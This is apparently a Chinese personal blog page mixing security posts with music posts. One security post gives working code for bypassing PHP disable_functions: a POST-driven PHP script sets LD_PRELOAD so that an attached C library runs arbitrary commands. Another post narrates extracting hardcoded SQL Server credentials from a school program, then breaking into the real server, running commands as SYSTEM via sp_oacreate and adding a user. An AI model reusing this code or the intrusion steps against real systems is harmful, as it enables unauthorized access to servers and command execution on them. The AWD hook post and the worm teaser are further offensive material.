低权AWD下的蓝队简易技巧

详情看上一篇方法,突然想到一个神奇的用法。

/*
how to use:
    gcc -fpic -c -ldl hook.c
    gcc -shared -lc -o hook.so hook.o
    export LD_PRELOAD=./hook.so
    export LD_PRELOAD=NULL;       //卸载库
*/

#include<stdio.h>
char* flag_path = "/flag";
extern int __open(char *,int,int);
int open(char * path,int flags,int mode)
{
    //printf("open :%s\n",path);
    if (strcmp(path,flag_path) == 0){
        // 在这里你甚至能加入什么东西,比如
        // sleep(2000000000);
        // 或者是
        // return __open(fake_flag_path,flags,mode);
        return -1;
    }
    return __open(path,flags,mode);
}

如果在双方都是低权并且是批量的话,一般没有点意识的都不会注意到环境变量的事情。
只要在本用户的和www用户的~/.bashrc设置LD_PRELOAD。或者在php环境中的config.php,加入waf的同时同时加入一句

<?php putenv("LD_PRELOAD=xxxxx"); ?>

就行啦。
如果实在没有config.php这种所有东西都会访问的文件的话,可以手工构造一个.user.ini
然后写入

auto_prepend_file=包含上面哪个代码或者你的waf的地址

这样所有的文件都会自动包含啦。
顺带附上一个文件夹监控的脚本,用pyinotify实现的。
脚本地址:file_manage.rar
当然一般情况下,基本是没有pyinotify环境的,所以这时候两个办法,下载源码安装或者编译两份出来。
源码地址:PyInstaller-3.5.tar.zip
或者是自己编译:
x86版本:file_manage.x86.zip
x64版本:file_manage.x64.zip

Tags: awd

老调重提,谈谈Bypass disable_function

640.png
当你插入webshell的时候,就会遇上这个问题,php.ini中,把能执行命令的函数(例如system)等,都禁掉了怎么办呢?

这时候,就可以参考之前那个

新坑预定:linux下的进程/文件隐藏

中,使用了LD_PRELOAD 环境变量。这个变量名字在当时说的很清楚了

设置了这个环境变量后,linux会优先加载这个环境变量下的动态链接库程序。

那么理论上,我们只需要找到一个会调用库函数的php内置方法,然后再上传我们的so文件,劫持这个库文件添加到LD_PRELOAD全局变量中,那么系统就会自动帮我们调用我们的so文件达到getshell的效果了。

然而前提是,你的disable_function没有禁putenv这个函数,否则以上都是空话了。

使用例子,putenv+mail函数

<?php
    $cmd = $_POST['cmd'];
    putenv("EVIL_CMDLINE=" . $cmd);
    $so_path = $_POST['so'];
    putenv("LD_PRELOAD=" . $so_path);
    mail("", "", "", "");
    unlink($out_path);
?>

以及对应的so文件:reinstall.rar
代码如下:

#define _GNU_SOURCE

#include <stdlib.h>
#include <stdio.h>
#include <string.h>


extern char** environ;

__attribute__ ((__constructor__)) void preload (void)
{
    // get command line options and arg
    const char* cmdline = getenv("EVIL_CMDLINE");

    // unset environment variable LD_PRELOAD.
    // unsetenv("LD_PRELOAD") no effect on some 
    // distribution (e.g., centos), I need crafty trick.
    int i;
    for (i = 0; environ[i]; ++i) {
            if (strstr(environ[i], "LD_PRELOAD")) {
                    environ[i][0] = '\0';
            }
    }

    // executive command
    system(cmdline);
}

其实知晓原理我们自己编写一份也挺简单的,先找到目标函数,去github/各种地方找到函数的原型,因为这次我们不是要HOOK而是直接getshell,原功能可以废弃,所以可以直接把内部实现方法掏空,替换成我们需要执行命令的代码,只需要请求参数和返回参数相同,不让程序崩溃,那么效果就可以达到了。详情可以参考我上面给出的那个连接

Tags: php

随手写了段jazz

10s真男人,然后我憋不出来了。
嗯,那个结尾成功把我自己封印。
不知道算不算jazz
伪jazz.mp3

Tags: none

第一首自己写比较完整的曲子

音乐地址在这里:dance.mp3

怎么说呢,虽然说旋律能自己随便编,甚至口哨天天都哼来哼去,但是完整的起承转合或者带有明显节奏型和鼓点的音乐却没怎么尝试过,原因不亚于中途自己听不下去了hhhh

今天上完管乐课回来,闲着无聊,正好就花了一点时间,试着写了下。

按照节奏来算,应该算舞曲+中国风吧?因为用的是Dance Loop加名族调式和FGEmAm万用和弦。

目前缺点有两个,过于单调和过场太过僵硬。整体透露出了一个字,憨!

旋律过于单调,很多时候脑袋里想着的旋律但是就是突然记不起来了,要整德时候就记不起来,或者想不出来,再或者就是自己技术太差,配不上对应德节奏型,达不到理想的效果,然后就果断德删工程了hhhhh

同时开头和结束是中间写完之后,哎呀,才忘了没有开头和结尾,就自己直接用一个自己乱写的solo当转场和结尾,憨批的不行hhh

然后结尾因为不知道啥问题,没录好,不过差不多这样吧_(:з)∠)_

本来是打算加个转调的,但是舍友都要睡觉了。今天就先瞎JB写到这里吧。

以及鼓点实在是写不来,整段鼓点一成不变,实在听不来。

不过第一次整出一个勉强能听的“完整的曲子”,还是很开心的

Tags: 音乐, 编曲

从逆向到反日

起因

在隔壁院的新生群里玩耍,正好听说有个专用程序,同时还有一天就开学了(其实是因为要补考,我实在复习不进去那什么中国音乐史,外国音乐史
2063193114.jpg
起因2.jpg
到手.jpg
很好,程序到手,分析一波

走起

界面.jpg
界面2.jpg
预计在MSGBOX那里有网络通信,随手输入几个数字,让我们看看到底是咋样通信的。
然后开启wireshark分析一波流量
流量.jpg
WTF??我看到了什么?这熟悉的语法。然而在流量中没有看到详细的连接请求,也就是账户密码等信息,所以先拿Nmap扫一波
sql server.jpg
确定是sqlserver,好,IDA PAO,启动!不对,在此之前,PEiD康康是什么壳
壳.jpg
发现是个ASP壳,emmm,直接ESP定律找OEP dump出来就行,甚至直接用脱壳机都可以。不管怎么样壳是脱了
脱壳.jpg
Delphi程序欸。现在有点少见了呢,其实我还以为是个MFC程序呢(
然而发现启动失败了
启动失败.jpg
⑨BIE发现事态有那么一丝不对劲.jpg
不管了,继续,能出现界面至少说明PE格式没有破坏。
拉到IDA看看逻辑
emmmmm.jpg
emmmmm??
几K个函数,分析不动。。看了半天晕了_(:з)∠)_。。不管了,先直接找字符串试试,输入对象IP
字符串.jpg
嘿找到了。
双击,X查找引用
call.jpg
发现作为参数压入了个奇怪的函数,这莫非就是连接函数?
wtf.jpg
wtf??
倒回去看了下,一个0-9A-Z的表,一个mov eax, unkonwn_address;push word ptr [eax +4]操作,再配合之前的脱壳后无法启动,这尼玛八成。啊不,九成九是加了混淆啊喂魂断。(╯‵□′)╯︵┻━┻
没办法,想了一下,程序连接sqlserver有什么方式呢?特别是这种古老的delphi。
试着搜索关键词User id=
数据库字符串.jpg
果不其然,收到了,继续X查看引用
sqllink.jpg
sqllink2.jpg
我们重点分析右下角的call sub_4052AC。跟进
堆栈不平衡.jpg
发现堆栈不平衡,可以知道,这基本也是混淆的问题了。但是,我们猜测,这应该是一个字符串拼接的地方,最后拼接出来的,肯定是一个带有账户密码的内存条件。
虽然二进制程序内加密了,不过不管了,我们已经大致知道程序运行流程了。就和ESP定律一样,无论你程序怎么编码,最后都是要出现在内存中的。
我们直接找原版无壳的丢到OD中去分析。
因为知道会创建窗口,所以我们用API断点,设置一个CreateWindowsA的断点
断点.jpg
走起,然后在断点处,用中文ASCII搜索功能搜索主线程字符串password
ascii.jpg
然后flow进去,在这个地方,右键,断点,内存访问
断点2.jpg
这样有啥程序调用我们这个,我们就都知道啦。
然后把之前的CreateWindows的断点清除,留下这个内存访问的断点,然后ctrl+F2重新开始程序。跟踪步入,GO。走起。

等下,走起之前,突然想起,这步入执行很慢的,走到那里要后年马月,根据IDA PRO的分析,我们知道,连接过程是在窗口启动之后才进行的,所以我们把断点设置到UpdateWindow,上,在那之后运行跟踪步入
find.jpg
成功找到,接下来,我们就F7单步执行,康康到底都写着啥,最后,在手都快按酸的情况下,终于找到了
找到啦.jpg
好,现在账号密码都有了,然而,我突然发现,这密码这一块,有三个框框,对应HEX是1E 1F 1A,起初以为是SQL SERVER的自定义颜色,我把1F1A3B输入进去,连接。发现错误。然后感觉call名称MutibyteToWideChar,以为是宽字节的字符串编码,这下让我为难了,这sql server怎么输入宽字符啊,用%号x之后,都不对,一气之下,直接复制黏贴进去。欸,成了
连上.jpg
惯例,测试xps_cmdshell。发现连接失败,直接超时了。
不是报错?那么就有几个原因

  1. 没开xps_shell =》 不太可能,毕竟没报错
  2. 没有权限 =》不太可能 原因如上
  3. 杀软或者其他奇怪设置拦截 =》 八成是这个

那么怎么办呢?这时候可以使用

declare @shell int 
exec sp_oacreate 'wscript.shell',@shell output 
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\log.txt'

然后再用

create table tmp_text (lines nvarchar(1000))
bulk insert tmp_text from N'C:\log.txt'
select * from tmp_text 
drop table tmp_text 

读取。首先我们先看看权限
whoami.jpg
system.jpg
emmmm,system可还行,直接新建一个用户,OK成功连上。
拿下.jpg

结束

总共前前后后下来,花了三个小时吧,之前不知道,分析过后才知道,自己动态调试技术实在太差了。

其实花的时间都浪费在了识别协议,解读程序流程(这段花了最多,我一直天真的以为我可以不靠调试器脑力解码2333),以及动态调试。

一趟下来,其实也挺好玩的。接下来的时间得多看看动态调试相关的书了emmm。

溜了溜了,得补考音乐史去了。哇的一声哭出来。

Tags: 分析

挖坑:简易"多态" "摆渡"蠕虫

标题用了几个看起来很酷炫的外来词汇,实际上就是个自修改+一个物理设备攻击而已emmmm

说起来明明用英文更帅一些为啥我用的是中文呢(谁叫我英语差hhhhh

灵感源自于非常早以前的文件夹exe病毒。之前也写过,但是并没有在意,因为那是14年左右我还没有理解过真正的内网同时小看了物理设备的威力。

开始挖坑,希望开学之前能填完

Tags: none
文章总数:200篇 分类总数:4个